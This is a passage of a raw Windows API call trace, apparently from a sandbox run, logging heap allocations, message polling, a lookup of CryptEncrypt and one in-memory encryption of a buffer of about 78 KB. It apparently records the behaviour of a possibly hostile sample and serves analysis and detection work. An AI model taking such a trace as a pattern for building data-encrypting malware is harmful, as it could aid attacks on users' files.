Flags=0x0, Size=0x8) returned 0x2e55038 [0263.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0263.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0263.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0263.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0263.441] CharLowerBuffW (in: lpsz="byte[78416]", cchLength=0xb | out: lpsz="byte[78416]") returned 0xb [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0263.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0263.445] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0263.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0263.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0263.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0263.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0263.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0263.449] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0263.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0263.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0263.450] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.450] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0263.452] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0263.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0263.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0263.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0263.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51d30 [0263.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51d30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0263.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0263.453] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0263.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0263.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e540f8 [0263.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0263.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0263.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0263.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0263.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0263.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0263.453] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe50048*, pdwDataLen=0x8cef60*=0x1324e, dwBufLen=0x13250 | out: pbData=0xe50048*, pdwDataLen=0x8cef60*=0x13250) returned 1 [0263.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0263.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0263.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0263.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0263.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0263.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0263.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0263.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0263.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0263.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0263.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0263.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0263.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0263.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0263.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0263.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0263.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0263.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0263.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0263.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0263.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0263.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0263.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0263.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0263.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0263.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0263.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0263.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0263.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0263.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0263.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0263.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0263.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0263.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0263.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0263.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0263.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0263.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0263.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0263.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0263.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0263.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0263.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0263.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0263.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fa0 | out: hHeap=0x970000) returned 1 [0263.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fd0 [0263.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fe8 [0263.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ee0 [0263.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0263.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ee0 | out: hHeap=0x970000) returned 1 [0263.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fe8 | out: hHeap=0x970000) returned 1 [0263.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0263.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0263.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0263.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0263.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0263.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0263.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0263.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0263.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0263.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0263.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0263.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0263.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0263.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0263.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0263.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0263.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0263.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0263.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0263.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0263.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0263.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0263.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0263.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0263.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0263.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0263.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0263.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13250) returned 0xe632a0 [0263.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0263.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0263.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0263.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.498] HeapFree (in: hHeap=0x970000, 